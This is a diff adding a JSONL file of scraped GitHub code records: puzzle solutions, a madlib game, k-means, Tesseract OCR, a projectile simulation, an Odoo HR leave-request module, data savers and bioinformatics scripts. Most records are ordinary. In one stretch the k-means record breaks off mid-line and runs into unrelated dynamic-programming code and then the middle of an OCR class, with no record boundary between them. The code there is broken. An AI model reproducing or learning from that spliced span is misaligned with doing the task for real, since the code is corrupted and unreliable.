diff --git "a/5254.jsonl" "b/5254.jsonl" new file mode 100644--- /dev/null +++ "b/5254.jsonl" @@ -0,0 +1,2188 @@ +{"seq_id":"16522770221","text":"from pprint import pprint\nfinput = '.^^^.^.^^^.^.......^^.^^^^.^^^^..^^^^^.^.^^^..^^.^.^^..^.^..^^...^.^^.^^^...^^.^.^^^..^^^^.....^....'\nrows = list()\nrows.append(finput)\ntotal_rows = int(input('How many rows to generate? '))\ndef flooring(r):\n p = '.'+r[(len(r)-1)]+'.'\n next = list()\n for i,c in enumerate(p[1:101],start=1):\n if p[i-1] == '^' and c == '^' and p[i+1] == '.': next.append('^')\n elif p[i-1] == '.' and c == '^' and p[i+1] == '^': next.append('^')\n elif p[i-1] == '^' and c == '.' and p[i+1] == '.': next.append('^')\n elif p[i-1] == '.' and c == '.' and p[i+1] == '^': next.append('^')\n #if p[i-1] == '' and c == '' and p[i+1] == '':\n else: next.append('.')\n r.append(''.join(next))\ndef rowcount(r):\n return r.count('.') \nwhile len(rows) < total_rows:\n flooring(rows)\nprint(sum(map(rowcount, rows)))\n","repo_name":"drdaley/AoC2016","sub_path":"d18_p1.py","file_name":"d18_p1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891235248","text":"from typing import List\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n r = cols = len(grid[0])\n ans = 0\n for row in grid:\n l = 0\n while l < r:\n m = (l + r) // 2\n if row[m] < 0:\n r = m\n else:\n l = m + 1\n ans += cols - r\n return ans\n\n\nclass Solution1:\n def countNegatives(self, grid: List[List[int]]) -> int:\n j = m = len(grid[0]) - 1\n ans = 0\n for row in grid:\n while j >= 0 and row[j] < 0:\n j -= 1\n ans += m - j\n return ans\n\n\nclass Solution2:\n def countNegatives(self, grid: List[List[int]]) -> int:\n h = len(grid)\n w = len(grid[0])\n res = 0\n for i in range(h):\n j = w\n while j > 0 and grid[i][j - 1] < 0:\n j -= 1\n res += (w - j) * (h - i)\n w = j\n if not w:\n break\n return res\n\n\ndef test():\n sol = Solution()\n\n print('Test 1... ', end='')\n assert sol.countNegatives(grid=[[4, 3, 2, -1], [3, 2, 1, -1], [1, 1, -1, -2], [-1, -1, -2, -3]]) == 8\n print('OK')\n\n print('Test 2... 
', end='')\n assert sol.countNegatives(grid=[[3, 2], [1, 0]]) == 0\n print('OK')\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/p1351_count_negative_numbers_in_a_sorted_matrix.py","file_name":"p1351_count_negative_numbers_in_a_sorted_matrix.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31780926284","text":"# from pyglet.media import Source, Player, load\n\n# player = Player()\n# source = load('crowd-cheering.mp3')\n# player.queue(source)\n# player.play()\n# while True:\n# input('Press any key to exit')\n# break\n\nfrom youtube_dl import YoutubeDL\n\noptions = {\n 'default_search': 'ytsearch5'\n}\n\nydl = YoutubeDL(options)\nsearch_result = ydl.extract_info('that girl', False)\nprint(search_result)","repo_name":"phanhr/c4t-20","sub_path":"finalhack/playmusic.py","file_name":"playmusic.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9129808248","text":"# encoding=utf-8\n\nimport os\n\n\ndef deleteFiles(dirName):\n for root, dirs, files in os.walk(unicode(dirName, 'utf-8')):\n for theFile in files:\n if theFile.endswith('.doc'):\n os.remove(os.path.join(root, theFile))\n print('删除成功')\n\n\nif \"__main__\" == __name__:\n deleteFiles(raw_input('请输入文件夹:'))\n","repo_name":"qianyue0317/python27pro","sub_path":"aboutWord/deleteAssignFile.py","file_name":"deleteAssignFile.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71311250173","text":"from io import StringIO\nimport re\n\nprint(\n \"\"\"Welcome to your Madlib Game! You will be provided with a series of prompts to enter a word that satisfies the requested word type. 
After you've answered all the promps, we'll use your words in a special story for you.\n\nJust a reminder:\n- adjectives are descriptive words\n- names should be a capitalized first name\n- nouns are people, places, and things\n- plural nouns are more than one of a noun\n- verbs are action words\n- past tense verbs are actions that took place in the past\n\nHere we go!\n\"\"\"\n)\n\n\ndef read_template(path):\n with open(path) as text:\n contents = text.read()\n stripped_contents = contents.strip()\n return stripped_contents\n\n\ndef parse_template(text):\n new = tuple(re.findall(r\"\\{(.*?)\\}\", text))\n length = len(new)\n for i in range(0, length):\n if i == 0:\n print(i)\n new_text = text.replace(new[i], \"\")\n else:\n new_text = new_text.replace(new[i], \"\")\n return new_text, new\n\n\ndef user_prompt(words):\n print(\"Please type a response to the prompt and press [ENTER]\")\n responses = []\n for word in words:\n responses.append(input(f\"Type (a/an) {word}: \"))\n return responses\n\n\ndef merge(strip, res):\n length = len(res)\n for i in range(0, length):\n if i == 0:\n story = strip.replace(\"{}\", res[i], 1)\n else:\n story = story.replace(\"{}\", res[i], 1)\n return story\n\n\ndef output():\n stripped, prompts = parse_template(read_template(\"assets/game_template.txt\"))\n\n res = user_prompt(prompts)\n f = open(\"assets/madlib.txt\", \"w\")\n f.write(merge(stripped, res))\n f.close()\n print(merge(stripped, res))\n\n\noutput()\n\n\n# Following is working code...\n\n# \"\"\"Mad Libs\"\"\"\n# \"\"\"Mad Lib Intro\"\"\"\n\n# STORY = \"I the %s and %s %s have %s %s's %s sister and plan to steal her %s %s! What are a %s and backpacking %s to do? Before you can help %s, you'll have to collect the %s %s and %s %s that open up the %s worlds connected to A %s Lair. There are %s %s and %s %s in the game, along with hundreds of other goodies for you to find.\"\n\n# print(\n# \"\"\"Welcome to this Madlib story. You will be provided with a series of prompts to enter a word that satisfies the requested word type. 
After you've answered all the promps, we'll use your words in a special story for you.\n\n# Just a reminder:\n# - adjectives are descriptive words\n# - names should be a capitalized first name\n# - nouns are people, places, and things\n# - plural nouns are more than one of a noun\n# - verbs are action words\n# - past tense verbs are actions that took place in the past\n\n# Here we go!\n# \"\"\"\n# )\n# print()\n\n# adjective1 = input(\"Write an adjective: \")\n# adjective2 = input(\"Write an adjective: \")\n# fName1 = input(\"Enter a first name: \")\n# pastTenseVerb = input(\"Input a verb: \")\n# fName2 = input(\"Enter a first name: \")\n# adjective3 = input(\"Write an adjective: \")\n# adjective4 = input(\"Write an adjective: \")\n# pluralNoun1 = input(\"Input a plural noun: \")\n# largeAnimal = input(\"A large animial: \")\n# smallAnimal = input(\"A small animial: \")\n# girlName = input(\"Enter a girl's name: \")\n# adjective5 = input(\"Write an adjective: \")\n# pluralNoun2 = input(\"Input a plural noun: \")\n# adjective6 = input(\"Write an adjective: \")\n# pluralNoun3 = input(\"Input a plural noun: \")\n# number50 = input(\"Input a number between 1 and 50: \")\n# fName3 = input(\"Enter a first name: \")\n# number1 = input(\"Input a number: \")\n# pluralNoun4 = input(\"Input a plural noun: \")\n# number2 = input(\"Input a number: \")\n# pluralNoun5 = input(\"Input a plural noun: \")\n\n# print()\n# print(\n# STORY\n# % (\n# adjective1,\n# adjective2,\n# fName1,\n# pastTenseVerb,\n# fName2,\n# adjective1,\n# adjective2,\n# pluralNoun1,\n# largeAnimal,\n# smallAnimal,\n# girlName,\n# adjective3,\n# pluralNoun2,\n# adjective4,\n# pluralNoun3,\n# number50,\n# fName3,\n# number1,\n# pluralNoun4,\n# number2,\n# pluralNoun5,\n# )\n# )\n","repo_name":"kevinhenry/madlib-cli","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30920476048","text":"import orthopy\n\nfrom ..tools import scheme_from_rc\nfrom ._helpers import LineSegmentScheme\n\n\ndef gauss_jacobi(n, alpha, beta, mode=\"numpy\"):\n degree = 2 * n - 1\n\n _, _, a, b = orthopy.line_segment.recurrence_coefficients.jacobi(\n n, alpha, beta, \"monic\", symbolic=True\n )\n points, weights = scheme_from_rc(a, b, mode=mode)\n return LineSegmentScheme(\"Gauss-Jacobi\", degree, weights, points)\n","repo_name":"LJPapenfort/quadpy","sub_path":"quadpy/line_segment/_gauss_jacobi.py","file_name":"_gauss_jacobi.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"33198316942","text":"import xml.etree.ElementTree as ET\n\nimport sys\nsys.path.append(\"../../\")\nfrom helper import *\n\nroot = xmlRoot(\"AN2015-1-FR42.xml\", encoding=\"iso-8859-1\")\nfor elem in root:\n Code = elem.find(\"Code\").text\n \n ValidFromQuarter, _ = quarterToInteger(elem, \"Geldig_vanaf\", \"Geldig_tot\")\n\n ID = ET.Element(\"Id\")\n ID.text = Code + \"-\" + ValidFromQuarter\n\n elem.append(ID)\n\noutfile = \"Adjusted_AN2015-1-FR42.xml\"\ntree = ET.ElementTree(root)\ntree.write(outfile, encoding=\"utf-8\")\n","repo_name":"chrdebru/dmfa_pub","sub_path":"Annexes/Annex42/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10720211629","text":"from numpy import *\ndef 
loadDataSet(fileName):\n dataMat=[]\n fr=open(fileName)\n for line in fr.readlines():\n curLine=line.strip().split('\\t')\n fltLine=array(curLine).astype(float)\n dataMat.append(fltLine)\n return mat(dataMat)\n\ndef distEclud(vecA,vecB):\n return sqrt(sum(power(vecA-vecB,2)))\n\ndef randCent(dataSet,k):\n n=shape(dataSet)[1]\n # centroids k个质心\n centroids=mat(zeros((k,n)))\n for j in range(n):\n minJ=min(dataSet[:,j])\n rangeJ=float(max(dataSet[:,j])-minJ)\n # dataSet矩阵中每一列最小值 加上一个范围 产生的k个点不超过dataSet\n centroids[:,j]=minJ+rangeJ*random.rand(k,1)\n return centroids\n\ndef KMeans(dataSet,k,distMeas=distEclud,createCent=randCent):\n m=shape(dataSet)[0]\n clusterAssment=mat(zeros((m,2)))\n centroids=createCent(dataSet,k)\n clusterChanged=True\n while clusterChanged:\n clusterChanged=False\n for i in range(m):\n minDist=inf;\n minIndex=-1\n for j in range(k):\n distJI=distMeas(centroids[j,:],dataSet[i,:])\n if distJI=0:\n dp[t]|=dp[t-time[i]]\nans=0\nfor i in range(sumtime//2+1):\n if dp[i]:\n ans=i\nprint(sumtime-ans)\n\n\"\"\"\nN=int(input())\ntime=list(map(int,input().split()))\n\nans=sum(time)\nhalf=ans-(ans//2)\n\nfor i in range(1,2**N-1):\n T=0\n for j in range(N):\n if (i>>j)%2:\n T+=time[j]\n if T>=half:\n if T imghdr:\n \"\"\"\n Given an image, returns the same image with all the ASCII characters boxed\n\n Parameters:\n img the original image\n Returns:\n image the same image with characters boxed\n \"\"\"\n dimensions = img.shape\n #con = r'--oem 3 --psm 6 outputbase characters'\n boxes = tes.image_to_boxes(img)#, config=con)\n for b in boxes.splitlines():\n b = b.split(\" \")\n x,y,w,h = int(b[1]),int(b[2]),int(b[3]),int(b[4])\n cv.rectangle(img, (x, dimensions[0]-y), (w, dimensions[0]-h), (100,100,225), 1)\n cv.putText(img, b[0], (x, dimensions[0]-y+15), cv.FONT_HERSHEY_COMPLEX_SMALL,0.75,(50,50,225),1)\n \n return img\n\n def boxWords(self, img: imghdr) -> imghdr:\n \"\"\"\n Given an image, returns the same image with all ASCII words boxed\n\n Parameters:\n img the original image\n Returns:\n image the same image with words boxed\n \"\"\"\n #con = r'--oem 3 --psm 6 outputbase characters'\n boxes = tes.image_to_data(img)#, config=con)\n for i,b in enumerate(boxes.splitlines()):\n if i != 0:\n b = b.split()\n if len(b) == 12 and float(b[10]) > 50:\n x,y,w,h = int(b[6]),int(b[7]),int(b[8]),int(b[9])\n cv.rectangle(img, (x, y), (w+x, h+y), (100,100,225), 1)\n cv.putText(img, self.roundWord(b[10]) + \": \" + b[11], (x, y), cv.FONT_HERSHEY_COMPLEX_SMALL, 0.6,(50,50,225), 1)\n return img\n\n def roundWord(self, word: str) -> int:\n \"\"\"\n Given string that represents a float, returns the rounded number as an int\n\n Parameters:\n word a string of a float\n Returns:\n integer the rounded value of the float\n \"\"\"\n return str(round(float(word), 2))\n\nif __name__ == \"__main__\":\n # Waits for user to specify image or video\n type_input = input(\"Please specify if you are providing an image or video (write 'Image' or 'Video'): \")\n if type_input == \"Image\":\n # Waits for user to specify path to image\n path_input = input(\"Please specify the path to your image: \")\n try:\n my_ocr = OCR()\n my_ocr.stillImage(path_input)\n except Exception as e:\n print(e)\n elif type_input == \"Video\":\n # Waits for user to specify path to video\n path_input = input(\"Please specify the path to your video: \")\n try: \n my_ocr = OCR()\n my_ocr.videoImage(path_input)\n except Exception as e: \n print(e)\n else:\n print(\"Improper 
input\")","repo_name":"earth15354/AIT-Internship","sub_path":"OCR.py","file_name":"OCR.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10007337423","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# https://physics.stackexchange.com/a/134863\n\n# Physical constants\nG = 9.81 # acceleration due to gravity (m/s^2)\n\nr = 0.05 # projectile radius (m)\nm = 0.2 # mass (kg)\n\nCd = 0.47 # drag coefficient of a sphere\nA = np.pi * r ** 2 # area (m^2)\nrho_air = 1.205 # Air density (kg.m-3) @ NTP\nrho_hydrogen = 0.0899 # Air density (kg.m-3) @ STP\n\n\ndef run_demo():\n # Initial speed and launch angle (from the horizontal).\n launch_angle = 65 # deg\n launch_velocity = 50 # m/s\n launch_height = 1 # m\n\n run_projectile_resistance_demo(launch_angle, launch_velocity, launch_height)\n\n\ndef run_projectile_resistance_demo(launch_angle, v0, h):\n phi0 = np.radians(launch_angle)\n\n # Initial conditions\n x0 = 0\n y0 = h\n Vx0 = v0 * np.cos(phi0)\n Vy0 = v0 * np.sin(phi0)\n\n # Interval of integration by iteration up to tf\n steps = 1000\n tf = (Vy0 + np.sqrt(Vy0 ** 2 + 2 * G * h)) / G # time of flight\n dt = tf / steps\n\n # No drag ----------------------------------------------------------------------------------------------------------\n X_ND = list()\n Y_ND = list()\n\n for t in range(steps + 1):\n X_ND.append(x0 + Vx0 * dt * t)\n Y_ND.append(y0 + Vy0 * dt * t - 0.5 * G * (dt * t) ** 2)\n\n # With drag --------------------------------------------------------------------------------------------------------\n X_WD = list()\n Y_WD = list()\n\n for loop, rho in enumerate([rho_hydrogen, rho_air]):\n sol = iterative((x0, y0, Vx0, Vy0), dt, steps, rho)\n\n # Retrieve the solution and append\n X_WD.append(sol[0])\n Y_WD.append(sol[1])\n tof = sol[4]\n ttm = sol[5]\n\n print(f'Time to target = {tof} s')\n print(f'Time to highest point = {ttm} s')\n print(f'Range to target, xmax = {X_WD[-1]} m')\n print(f'Maximum height, zmax = {max(Y_WD[loop])} m')\n\n # Plot results\n x = [X_ND] + X_WD\n y = [Y_ND] + Y_WD\n\n plot(x, y)\n\n\ndef iterative(u0, dt, steps, rho):\n x0, y0, Vx0, Vy0 = u0\n\n x_list = list()\n y_list = list()\n Vx_list = list()\n Vy_list = list()\n\n x_list.append(x0)\n y_list.append(y0)\n Vx_list.append(Vx0)\n Vy_list.append(Vy0)\n\n # Interval of integration by ODE method up to tf -------------------------------------------------------------------\n stop = 0 # stop condition flag to end for loop\n tof = 0 # time of flight\n ttm = 0 # time to max\n last_smallest_Vy = 1e05\n\n # Initial conditions -------------------------------------------------------------------------------------------\n x, y, Vx, Vy = x0, y0, Vx0, Vy0\n\n for t in range(1, steps + 1):\n if stop != 1:\n u = x, y, Vx, Vy\n\n # log data -------------------------------------------------------------------------------------------------\n Vx, Vy, ax, ay = deriv(t, u, rho)\n\n # increment state by dt ------------------------------------------------------------------------------------\n # position\n x += Vx * dt\n y += Vy * dt\n\n # velocity\n Vx += ax * dt\n Vy += ay * dt\n\n t += t * dt\n\n # log data -------------------------------------------------------------------------------------------------\n x_list.append(x)\n y_list.append(y)\n\n Vx_list.append(Vx)\n Vy_list.append(Vy)\n\n # log event - reached highest point why Vy=0 (note: discrete dt step misses 0.0)\n if np.abs(Vy) < last_smallest_Vy:\n 
last_smallest_Vy = Vy\n ttm = t * dt\n\n # stop event - hit target\n if y <= 0.0:\n tof = t * dt\n stop = 1\n\n return x_list, y_list, Vx_list, Vy_list, tof, ttm\n\n\ndef deriv(t, u, rho):\n x, y, Vx, Vy = u\n k = 0.5 * Cd * rho * A # convenience constant\n\n Vxy = np.hypot(Vx, Vy)\n ax = -k / m * Vxy * Vx # acceleration in x direction\n ay = -k / m * Vxy * Vy - G # acceleration in y direction\n return Vx, Vy, ax, ay\n\n\ndef plot(x, y):\n fig, ax1 = plt.subplots(figsize=(10, 5))\n if isinstance(x[0], list):\n for i in range(len(x)):\n plt.plot(x[i], y[i], label='id %s' % i)\n else:\n plt.plot(x, y)\n\n ax1.set_title('Projectile Demo with air resistance')\n ax1.set_xlabel('distance (m)')\n ax1.set_ylabel('height (m)')\n ax1.legend(['$\\\\rho=0.0$ (vacuum)', f'$\\\\rho={rho_hydrogen}$ (hydrogen)', f'$\\\\rho={rho_air}$ (air)'])\n\n plt.grid()\n plt.show()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n run_demo()\n","repo_name":"Tektronica/projectile_demos","sub_path":"demo_05a_projectile_resistance_iterative.py","file_name":"demo_05a_projectile_resistance_iterative.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10268181277","text":"# -*- coding: utf-8 -*-\n# © <2017> \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom datetime import datetime\nimport logging\nimport uuid\n\nfrom openerp import fields, models, api\nfrom odoo.exceptions import UserError\n\n_logger = logging.getLogger(__name__)\n\nclass hr_leave_request(models.Model):\n _name = 'hr.leave.request'\n _description = 'HR LEAVE REQUEST'\n\n name = fields.Char(\n string='ID'\n )\n worker_request = fields.Boolean(\n string='Otro empleado',\n default=False\n )\n worker_id = fields.Many2one(\n string='Empleado',\n comodel_name='hr.employee'\n )\n worker_company_id = fields.Many2one(\n string='Empresa',\n comodel_name='res.company',\n related='worker_id.company_id'\n )\n employee_id = fields.Many2one(\n string='Empleado',\n comodel_name='hr.employee',\n default=lambda self: self._current_employee_id()\n )\n company_id = fields.Many2one(\n string='Empresa',\n comodel_name='res.company',\n related='employee_id.company_id'\n )\n from_time = fields.Datetime(\n string='Entrada'\n )\n to_time = fields.Datetime(\n string='Salida'\n )\n paid = fields.Boolean(\n string='Permiso pagado'\n )\n check_id = fields.Many2one(\n string='Autoriza',\n comodel_name='res.users'\n )\n check_user = fields.Boolean(\n string='Revisor',\n compute=lambda self: self._compute_check_user()\n )\n access_token = fields.Char(\n string='Token',\n size=50\n )\n ltype = fields.Selection(\n string='Tipo',\n required=True,\n default='01',\n size=2,\n selection=[\n ('01', 'Entrar tarde'),\n ('02', 'Salir temprano'),\n ('03', 'Salir y regresar'),\n ('04', 'Todo el día')\n ]\n )\n leave_day = fields.Date(\n string='Día'\n )\n description = fields.Text(\n string='Descripción'\n )\n state = fields.Selection(\n string='Estado',\n default='NEW',\n size=4,\n selection=[\n ('NEW', 'Creada'),\n ('SEND', 'Enviada'),\n ('OK', 'Autorizada'),\n ('REJ', 'Rechazada'),\n ]\n )\n sync_state = fields.Selection(\n string='Sincronización',\n default='OK',\n size=4,\n index=True,\n selection=[\n ('SYNC', 'Sincronizar'),\n ('OK', 'Sincronizado')\n ]\n )\n\n\n @api.model\n def create(self, vals):\n\n if 'from_time' not in vals.keys() or 'to_time' not in vals.keys():\n raise UserError('No es posible crear la 
solicitud')\n\n rec = super(hr_leave_request, self).create(vals)\n\n rec.sudo().write({\n 'name': 'LR-%s' % str(rec.id).zfill(6)\n })\n\n return rec\n\n def _current_employee_id(self):\n\n employee = self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)\n\n if not employee.id:\n raise UserError('No es posible crear solicitudes, contacte al departamento de Soporte técnico')\n\n if not employee.boss_id and not employee.coach_id:\n raise UserError('No es posible crear solicitudes, contacte al departamento de RH - Nómina')\n\n return employee.id\n\n def _compute_check_user(self):\n\n for item in self:\n item.check_user = self.env.uid == self.check_id.id and self.state == 'SEND'\n\n @api.multi\n def action_send(self):\n\n check_employee = self.employee_id.boss_id or self.employee_id.coach_id\n\n if not check_employee:\n raise UserError('No es posible enviar la solicitud, contacte al departamento de RH - Nómina')\n\n if not check_employee.user_id:\n raise UserError('La persona que autoriza sus solicitudes no cuenta con un usuario asociado al empleado, contacte al departamento de RH - Nómina')\n\n self.check_id = check_employee.user_id.id\n self.state = 'SEND'\n self.access_token = str(uuid.uuid4()).replace('-','')\n\n template = self.env.ref('hr_paysheet.pending_approve_leave_notify_template')\n self.env['mail.template'].browse(template.id).sudo().send_mail(self.id, force_send=True)\n\n @api.multi\n def action_approve(self):\n self.action_check('OK')\n self.sudo().sync_state = 'SYNC'\n\n @api.multi\n def action_direct_approve(self):\n self.action_check('OK')\n self.sudo().sync_state = 'SYNC'\n\n @api.multi\n def action_decline(self):\n self.action_check('REJ')\n\n def action_check(self, _state):\n\n self.sudo().state = _state\n\n template = self.env.ref('hr_paysheet.leave_request_result_notify_template')\n template.sudo().send_mail(self.id, force_send=True)","repo_name":"cardona18/ifaco","sub_path":"hr_paysheet/models/hr_leave_request.py","file_name":"hr_leave_request.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73471793852","text":"# Import the necessary libraries and modules\nimport pandas as pd # For saving the prediction and the recommendation in a tabular format\nimport geopandas as gpd # For saving the prediction and the recommendation in a spatial format\nimport sqlite3 # For saving the prediction and the recommendation in a relational database\nimport pymongo # For saving the prediction and the recommendation in a non-relational database\nimport tkinter as tk # For creating the file dialog\nimport tkinter.filedialog as fd # For creating the file dialog\n\n# Define the saver function that saves the prediction and the recommendation\ndef saver(prediction, recommendation, pred_rec_type):\n # Create a file dialog to select the file name and location\n file_name = fd.asksaveasfilename(title=\"Save Prediction and Recommendation\")\n\n # Check if the file name is valid\n if file_name:\n # Save the prediction and the recommendation in a file according to the file extension\n if file_name.endswith(\".csv\"):\n # Save the prediction and the recommendation in a csv file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Concatenate the prediction and the recommendation data frames\n 
pred_rec_df = pd.concat([prediction_df, recommendation_df], axis=1)\n # Write the prediction and the recommendation data frame to a csv file\n pred_rec_df.to_csv(file_name, index=False)\n\n elif file_name.endswith(\".json\"):\n # Save the prediction and the recommendation in a json file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Concatenate the prediction and the recommendation data frames\n pred_rec_df = pd.concat([prediction_df, recommendation_df], axis=1)\n # Write the prediction and the recommendation data frame to a json file\n pred_rec_df.to_json(file_name, orient=\"records\")\n\n elif file_name.endswith(\".xlsx\"):\n # Save the prediction and the recommendation in an excel file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Create a writer object for the excel file\n writer = pd.ExcelWriter(file_name, engine=\"xlsxwriter\")\n # Write the prediction and the recommendation data frames to separate sheets in the excel file\n prediction_df.to_excel(writer, sheet_name=\"Prediction\", index=False)\n recommendation_df.to_excel(writer, sheet_name=\"Recommendation\", index=False)\n # Save the excel file\n writer.save()\n\n elif file_name.endswith(\".shp\"):\n # Save the prediction and the recommendation in a shapefile\n # Convert the prediction and the recommendation into geo data frames\n prediction_gdf = gpd.GeoDataFrame(prediction, columns=[\"Yield\", \"Quality\", \"geometry\"])\n recommendation_gdf = gpd.GeoDataFrame(recommendation, columns=[\"Action\", \"Intervention\", \"geometry\"])\n # Overlay the prediction and the recommendation geo data frames\n pred_rec_gdf = gpd.overlay(prediction_gdf, recommendation_gdf, how=\"intersection\")\n # Write the prediction and the recommendation geo data frame to a shapefile\n pred_rec_gdf.to_file(file_name)\n\n else:\n # Raise an exception if the file extension is invalid\n raise ValueError(f\"Invalid file extension: {file_name}\")\n\n # Save the prediction and the recommendation in a database according to the user's choice\n # Ask the user if they want to save the prediction and the recommendation in a database\n db_choice = tk.messagebox.askyesno(title=\"Save Prediction and Recommendation in Database\", message=\"Do you want to save the prediction and recommendation in a database?\")\n\n # Check if the user's choice is yes\n if db_choice:\n # Ask the user to choose the type of database\n db_type = tk.simpledialog.askstring(title=\"Choose Database Type\", prompt=\"Please choose the type of database: sqlite or mongodb\")\n\n # Check the type of database\n if db_type == \"sqlite\":\n # Save the prediction and the recommendation in a sqlite database\n # Create a connection to the sqlite database\n conn = sqlite3.connect(\"pred_rec.db\")\n # Create a cursor object\n cur = conn.cursor()\n # Create a table for the prediction and the recommendation\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS pred_rec (\n id INTEGER PRIMARY KEY,\n yield REAL,\n quality INTEGER,\n action TEXT,\n intervention TEXT\n )\"\"\")\n # Insert the prediction and the recommendation into the table\n for i in range(len(prediction)):\n cur.execute(\"\"\"INSERT INTO pred_rec (yield, quality, action, 
intervention) VALUES (?, ?, ?, ?)\"\"\",\n (prediction[i][0], prediction[i][1], recommendation[i][0], recommendation[i][1]))\n # Save the changes to the database\n conn.commit()\n # Close the connection to the database\n conn.close()\n\n elif db_type == \"mongodb\":\n # Save the prediction and the recommendation in a mongodb database\n # Create a connection to the mongodb database\n client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n # Create a database for the prediction and the recommendation\n db = client[\"pred_rec\"]\n # Create a collection for the prediction and the recommendation\n col = db[\"pred_rec\"]\n # Insert the prediction and the recommendation into the collection\n for i in range(len(prediction)):\n col.insert_one({\n \"yield\": prediction[i][0],\n \"quality\": prediction[i][1],\n \"action\": recommendation[i][0],\n \"intervention\": recommendation[i][1]\n })\n # Close the connection to the database\n client.close()\n\n else:\n # Raise an exception if the type of database is invalid\n raise ValueError(f\"Invalid type of database: {db_type}\")\n else:\n # Raise an exception if the file name is invalid\n raise FileNotFoundError(f\"No file selected\")\n","repo_name":"King-Debo/Crop-Yield-and-Quality-Predictor-and-Improver","sub_path":"saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40092125130","text":"import cv2\nimport csv\nimport time\n\n\ndef save_snapshot(result_img, data):\n timestamp = time.strftime(\"%d-%m-%Y-%H-%M-%S\")\n image_path = f\"frame-{timestamp}.jpg\"\n csv_path = f\"output-{timestamp}.csv\"\n\n cv2.imwrite(image_path, cv2.cvtColor(result_img, cv2.COLOR_RGB2BGR))\n\n with open(csv_path, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow([\"Gender\", \"Age\"])\n writer.writerows(data)\n\n print(\"Snapshot saved:\", image_path)\n print(\"CSV file saved:\", csv_path)\n print(\"Timestamp:\", timestamp)\n","repo_name":"kimyeonsooo/opensourceBasic","sub_path":"save_snapshot.py","file_name":"save_snapshot.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18976913705","text":"import pydnameth as pdm\nfrom scripts.develop.routines import *\nfrom tqdm import tqdm\nimport numpy as np\nfrom scipy.stats import pearsonr, pointbiserialr\nfrom statsmodels.stats.multitest import multipletests\nfrom paper.routines.infrastructure.save.table import save_table_dict_xlsx\n\nsave_path = 'E:/YandexDisk/Work/pydnameth/unn_epic/comparison'\n\ndata_unn_epic = pdm.Data(\n path='',\n base='unn_epic'\n)\nannotations_unn_epic = pdm.Annotations(\n name='annotations',\n type='850k',\n exclude='bad_cpgs_from_ChAMP',\n select_dict={\n 'CHR': ['-X', '-Y']\n }\n)\ntarget_unn_epic = 'Age'\nobservables_unn_epic = pdm.Observables(\n name='observables',\n types={}\n)\ncells_unn_epic = pdm.Cells(\n name='cell_counts_horvath_filtered_normalized',\n types='any'\n)\nattributes_unn_epic = pdm.Attributes(\n target=target_unn_epic,\n observables=observables_unn_epic,\n cells=cells_unn_epic\n)\ndata_params_unn_epic = get_data_params(data_unn_epic.base)\n# data_params_unn_epic = {\n# 'norm': 'BMIQ',\n# 'part': 'raw',\n# }\nconfig_unn = pdm.load_beta_config(\n data_unn_epic,\n annotations_unn_epic,\n attributes_unn_epic,\n data_params=data_params_unn_epic\n)\n\n\n\n\ndata_other = pdm.Data(\n path='',\n base='GSE87571'\n)\nannotations_other = 
